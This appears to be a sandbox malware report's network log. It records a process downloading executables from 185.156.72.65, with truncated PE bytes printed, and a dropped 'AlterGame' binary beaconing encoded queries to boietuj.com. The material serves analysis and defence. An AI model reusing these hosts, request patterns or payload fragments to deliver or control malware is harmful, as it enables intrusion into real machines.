                                                                Nov 20, 2024 05:02:17.857166052 CET1236INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                                                Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                                                Nov 20, 2024 05:02:17.857199907 CET448INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                                                Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                                                Nov 20, 2024 05:02:17.857254028 CET1236INData Raw: 94 56 6f 92 44 df 99 d0 e2 07 87 22 38 2a d1 8d 6b 3b c8 f7 e1 b5 00 e9 38 74 ca 24 b7 c2 3f 88 77 ac 79 7e 4b f0 5e 79 57 bd f5 65 c6 f8 b8 fd c0 5d 9c 70 37 a5 45 ab 76 ba a0 33 8b ee 99 a3 da 61 9a 35 1f f1 31 09 03 71 96 d5 28 76 57 11 9e 5e
                                                                Data Ascii: VoD"8*k;8t$?wy~K^yWe]p7Ev3a51q(vW^RK@$V+4trcwMMZoj^}xmgu0f'US]*04<cMk2cD$g|5r_gqKgLoZ
                                                                Nov 20, 2024 05:02:17.857333899 CET1236INData Raw: 58 c0 cb 65 40 62 96 d2 c0 5a b0 40 d6 25 d6 ca ea 81 87 4f 4f 97 dc 41 ef 2a 66 64 06 53 6d 2a 3f d8 44 59 af 7a 70 c9 ee 8f c8 c1 db 27 48 69 d8 e7 8e c2 56 b7 01 bc 0b 63 45 c8 b6 b5 e2 1a ee a7 1a fe a7 05 65 86 dc c4 60 f9 00 38 79 10 46 0b
                                                                Data Ascii: Xe@bZ@%OOA*fdSm*?DYzp'HiVcEe`8yF|G(^80y-`p+x@Q.QjK=s3GVBfP:}^-RuJhJHz#<6S}Cc*>:cNZNG1M4
                                                                Nov 20, 2024 05:02:17.857368946 CET1236INData Raw: 97 c8 49 60 d1 46 16 fc 9d 61 11 37 f4 93 5e ed 32 7a c7 3b 41 14 16 b7 4f 84 8d 39 ca 79 46 fc 2f a4 a6 82 f3 b6 68 61 61 41 32 66 02 00 57 51 d9 b9 0a 9a 35 e2 01 f6 64 48 f1 ee 15 5c 2f c3 ce e2 74 99 ad e8 49 c0 49 83 58 d9 d9 5f 15 11 8a 28
                                                                Data Ascii: I`Fa7^2z;AO9yF/haaA2fWQ5dH\/tIIX_( N%"PPLT(yFqG=)hZX.`2RsbifK!97e9f|uUsetj9L~DY)5:w<}gBO$5)iI
                                                                Nov 20, 2024 05:02:17.857450008 CET1236INData Raw: bd fe 32 26 39 43 46 ac 46 98 3a a9 90 2f db c5 e7 08 95 6c c4 71 43 67 26 21 a1 8e e2 57 01 bf 17 eb ec 95 38 79 19 72 66 f5 b3 f7 1b 75 10 9d 34 6d e2 d0 9a 09 6a 6b 6e fb a0 1b a0 0c 89 8d 39 0d 7b 82 10 1c fb a1 a0 b6 fb 0b bd 91 68 87 0f bc
                                                                Data Ascii: 2&9CFF:/lqCg&!W8yrfu4mjkn9{h`e\lrp<wW+:s_m]sad8t43g\]Dh-@H<|jSWU@E/]-L[uNIhq8~'??y9<N5)g.AK2T
                                                                Nov 20, 2024 05:02:17.857486010 CET1236INData Raw: 9c 93 85 55 4b b0 90 0f 56 82 0c 86 f6 cc 27 8b b1 b8 1f 77 0d b6 88 24 2a 38 27 bc 8c 03 45 5b 5b 2b 90 a7 9b 51 a3 04 60 88 c5 2c 4a 7a 88 0a 01 7d 0c 2e 87 47 cf 80 8f 5e 70 62 4c d5 ad ce bf 64 f2 8f 59 f3 8f 0c c9 92 4f 19 2f 5b b6 f8 01 87
                                                                Data Ascii: UKV'w$*8'E[[+Q`,Jz}.G^pbLdYO/[)o319Xz&k(pB~IjB1aNG^L/QAD!B5F$%RkQzo):z4fJnpb7[w\n@hm,tsY!FZ*b[.LJT/
                                                                Nov 20, 2024 05:02:17.857909918 CET1236INData Raw: 92 77 46 c5 a7 fd 0a 9c 05 19 d8 07 e6 4e b6 52 f6 4f b7 e8 ab ac 30 f3 96 21 2d c8 20 bf 88 b6 9e a4 76 30 56 bc a4 59 bd ec 71 d2 3d ed d8 5f 82 8c b2 16 8f 65 8e 70 b5 77 5e 52 a6 89 7a 08 f3 c9 84 ea 32 44 a6 8a 12 81 c2 79 91 50 d2 42 01 86
                                                                Data Ascii: wFNRO0!- v0VYq=_epw^Rz2DyPBh0;ZP!WD.&\"'A2tCarnt9zq]&gmk0~q\mk0G@D)ewX5'%?/-Rcsi?G(F;7@J2v_9`P,uA
                                                                Nov 20, 2024 05:02:17.857944965 CET776INData Raw: 63 70 2d 5e 06 f9 a0 88 b2 fe 94 69 78 3a 4d 9f ad 12 4c f0 0a b3 a2 cb 51 00 a5 7b 91 82 2b bb fa aa 10 54 85 b0 7c f4 3c 4b 81 dd ca da d8 19 bf dc 6e eb 76 44 8c 05 1f 15 0d a7 42 02 a3 d9 fa bd 7f 9d a5 c8 1a 0f a8 ed c9 af 96 dc b8 58 66 95
                                                                Data Ascii: cp-^ix:MLQ{+T|<KnvDBXfbyQ#^XJx^0V|eQSSO^_]/qA]E<P/(#o(MDvo.QcR*S8k][[{:?uH+go6S%m:
                                                                Nov 20, 2024 05:02:17.858196020 CET1236INData Raw: 70 a2 12 da 26 de 65 6b de 5a 61 0b c8 a2 6d 52 66 a8 66 51 d1 c3 c9 87 9b d8 0b 44 57 eb 08 d8 cd bc b7 be b7 f1 4b 89 c0 b1 44 55 84 bc 8d 8d 36 2c c3 07 89 a5 46 50 8a ac fe f3 ba 23 4d 4f e4 0f 27 9f e1 11 07 f4 e0 e7 17 61 0e 07 54 3f cc 3f
                                                                Data Ascii: p&ekZamRffQDWKDU6,FP#MO'aT??:wMDa%k;3?Bc| yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6Dt
                                                                Nov 20, 2024 05:02:18.122930050 CET395OUTGET /files/download HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                User-Agent: C
                                                                Host: 185.156.72.65
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Nov 20, 2024 05:02:18.980966091 CET1236INHTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:18 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Disposition: attachment; filename="ONE.file";
                                                                Content-Length: 4065622
                                                                Keep-Alive: timeout=5, max=97
                                                                Connection: Keep-Alive
                                                                Content-Type: application/octet-stream
                                                                Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 [TRUNCATED]
                                                                Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F@@@@P,CODEd `DATAL@BSS.idataP@.tls.rdata@P.reloc@P.rsrc,,@P@@P


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.449731185.156.72.65806556C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:02:24.920368910 CET395OUTGET /files/download HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                User-Agent: C
                                                                Host: 185.156.72.65
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Nov 20, 2024 05:02:25.673360109 CET1236INHTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:25 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Disposition: attachment; filename="PAB1.file";
                                                                Content-Length: 4608
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: application/octet-stream
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d9 07 c8 de 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 08 00 00 00 08 00 00 00 00 00 00 de 26 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 26 00 00 4f 00 00 00 00 40 00 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 ec 25 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0& @@ @&O@`%8 H.text `.rsrc@@@.reloc`@B&H\ *(*BSJBv4.0.30319l#~,H#Stringst#USx#GUID#BlobG3xZ!,IA&`5{@AP #R ;)19
                                                                Nov 20, 2024 05:02:25.673430920 CET1236INData Raw: 10 00 41 00 d4 01 10 00 49 00 d4 01 10 00 51 00 d4 01 10 00 59 00 d4 01 10 00 61 00 d4 01 15 00 69 00 d4 01 10 00 71 00 d4 01 10 00 79 00 d4 01 10 00 81 00 d4 01 06 00 2e 00 0b 00 29 00 2e 00 13 00 32 00 2e 00 1b 00 51 00 2e 00 23 00 5a 00 2e 00
                                                                Data Ascii: AIQYaiqy.).2.Q.#Z.+k.3k.;k.CZ.Kq.Sk.[k.c.k.s<Module>mscorlibGuidAttributeDebuggableAttributeComV
                                                                Nov 20, 2024 05:02:25.673445940 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 00 00 00 00 00 00 00 00 00 00 00 00 5f 43 6f 72 45 78 65 4d 61 69 6e 00 6d 73 63 6f 72 65 65 2e 64 6c 6c 00 00 00 00 00 ff 25 00 20 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: &_CorExeMainmscoree.dll% @
                                                                Nov 20, 2024 05:02:25.673463106 CET1162INData Raw: 2e 00 30 00 2e 00 30 00 2e 00 30 00 00 00 38 00 08 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 31 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 00 00 cc 43 00 00 ea 01 00 00 00 00 00 00
                                                                Data Ascii: .0.0.08Assembly Version1.0.0.0C<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity
                                                                Nov 20, 2024 05:02:27.985363007 CET395OUTGET /files/download HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                User-Agent: C
                                                                Host: 185.156.72.65
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Nov 20, 2024 05:02:28.314224005 CET203INHTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:28 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 1
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 30
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.449858185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:18.590806007 CET314OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90 HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:19.330084085 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:19.441055059 CET314OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90 HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:19.707802057 CET1236INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 34 31 34 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 62 37 36 35 62 62 33 37 34 66 30 36 37 62 37 33 32 35 36 63 30 65 30 64 35 30 65 63 61 34 32 63 64 37 64 62 30 31 62 66 64 33 32 38 38 33 38 65 33 31 36 62 38 36 37 63 37 35 61 61 35 65 61 34 65 65 37 35 62 37 66 34 33 65 63 32 66 36 36 39 34 33 64 37 39 38 63 66 66 31 32 64 65 65 64 39 30 39 39 32 35 63 39 36 61 39 63 31 33 64 38 35 30 38 66 32 31 62 37 35 30 62 36 66 37 35 65 32 39 65 34 36 35 64 62 66 34 36 37 62 30 38 39 65 35 64 30 34 61 65 36 33 35 63 38 31 66 33 31 34 33 35 39 32 36 66 64 32 34 37 35 30 66 37 38 62 38 65 35 38 35 66 34 38 32 32 64 35 31 65 36 35 37 37 61 32 38 66 63 33 34 35 63 66 37 66 35 66 39 38 64 66 66 33 37 36 35 61 35 65 35 34 33 39 38 38 30 66 62 37 61 32 37 31 [TRUNCATED]
                                                                Data Ascii: 41467b68a8a3203a77b0418f55f677c81c459fe8bd2e91f1ef5a25ce91585bccfb5fbc40ad9088be8de2266e208a6bb9d592deb765bb374f067b73256c0e0d50eca42cd7db01bfd328838e316b867c75aa5ea4ee75b7f43ec2f66943d798cff12deed909925c96a9c13d8508f21b750b6f75e29e465dbf467b089e5d04ae635c81f31435926fd24750f78b8e585f4822d51e6577a28fc345cf7f5f98dff3765a5e5439880fb7a2718bc61ed86cab26ccf6a00212f66af56c4d9ad392eb1c80dbd1eb8aa33a6c4cc2e752a06d931eb13eedab80251d03e0dc654dfed629d28bd975ea2e2dba9c33e3dbf70bcf30b9cbebd7353aa86f421adf58d8401ef14e044814a6cd1b7c0fbd24f67a199e53eaa6a8e0929ad25ca3ade970ac85db5310f1d53c9c96c5c2551609bfd892326614f10cfc9b0101ae3d7b8eec335797ef93d87c10f0a409daacf0a4e5ad27e6b5b324ffdd0d7cffacb539c3c6746fc6236822aa8ce957e9455c4892a180b619dfc9fee1a11a72c88c6107201c336cef19b09763571963701f35e4479798745d9a6a1e733a9d0c21052862cc841488cbbd27bd3513aa96ce42727b364805f14cbbaa5ab67b9c2089450d7d9c341a810b748f6acae679aaa30ab2a321235c585721fe9a1cb4673e02b262b1019c128a959ac159141dda0dec20ebd19e6dcef977250df3b76e1c406ae1156410cd [TRUNCATED]
                                                                Nov 20, 2024 05:03:19.707851887 CET16INData Raw: 31 66 62 61 32 31 61 66 62 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1fba21afb0
                                                                Nov 20, 2024 05:03:22.379276037 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:22.679676056 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.449885185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:22.806027889 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:23.511003017 CET1108INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 33 38 34 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 63 38 66 63 66 66 35 31 65 31 39 65 62 62 64 35 35 65 39 30 33 63 61 66 66 38 64 65 37 39 35 38 37 34 64 38 30 34 37 64 31 65 34 64 63 32 61 33 30 61 31 35 32 66 66 64 36 63 64 30 37 32 39 65 39 37 64 35 39 61 64 37 35 66 36 36 63 61 38 33 32 35 33 64 65 66 63 64 33 30 62 64 65 34 31 63 38 37 65 61 65 31 34 66 61 33 39 38 66 32 36 65 34 31 30 61 64 36 37 63 63 35 36 61 35 65 32 34 36 65 34 34 34 37 36 34 61 66 32 32 64 36 31 39 66 33 65 36 37 38 65 66 34 31 30 63 39 65 62 38 62 39 39 33 64 64 33 36 65 39 31 31 31 63 36 35 31 38 36 32 32 62 63 35 64 62 33 65 39 35 66 32 61 65 63 37 32 64 30 65 33 37 38 62 39 38 36 66 31 64 34 34 66 65 66 32 30 63 38 31 65 33 31 35 37 35 65 32 30 65 33 32 35 37 39 30 39 36 66 62 62 66 32 38 63 66 65 38 66 33 33 35 30 65 33 35 35 36 35 32 33 66 64 32 62 35 37 66 33 66 63 65 37 38 63 66 31 33 66 37 38 61 31 66 33 34 36 39 61 38 35 65 35 37 62 32 30 30 [TRUNCATED]
                                                                Data Ascii: 38467b69c953804b26b565fe95b321bd19a55fc8fcff51e19ebbd55e903caff8de795874d8047d1e4dc2a30a152ffd6cd0729e97d59ad75f66ca83253defcd30bde41c87eae14fa398f26e410ad67cc56a5e246e444764af22d619f3e678ef410c9eb8b993dd36e9111c6518622bc5db3e95f2aec72d0e378b986f1d44fef20c81e31575e20e32579096fbbf28cfe8f3350e3556523fd2b57f3fce78cf13f78a1f3469a85e57b200dbc68e792cab265d160032d2f66ad49ccdca9272fbacc04b900b9a239b9c6ce2e75220fcd31ec0defd1b70d4ed23f13cf5dd9ed619d2fa99758a2fcd2a9c63126be78bde60e9ebebb7544a680ea23aef68f851fed14e95b824f72cdb5dffedd5466a690e43baf74890436ab2bca39dd981eca5bb02f061e52c0d66e5c3b596c87e2882932614e11d1c3b41319fcd6b8e9d63c7d65e53f87dc040d4183abc0064640d47d7551324ae1cfd3cff2d4519d3e724ffc793e8328b6cf987d894ac28e27020a689ee99cea1f05a72f8ad8197203de29cdfd9416773570833104e75d467e678d45dea6a2e23cbdd3c6164c8c2ac048538db2dc66d34f39b66cfc2c23b47a82561bc5a7a4ae6facc1049750d7daca55ab13a94affaeb0659b9e0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.449892185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:23.633956909 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:24.349406958 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.449898185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:24.477838039 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:25.182888985 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.449904185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:25.310781002 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:26.013364077 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.449910185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:26.258687019 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:26.982481003 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.449917185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:27.111489058 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
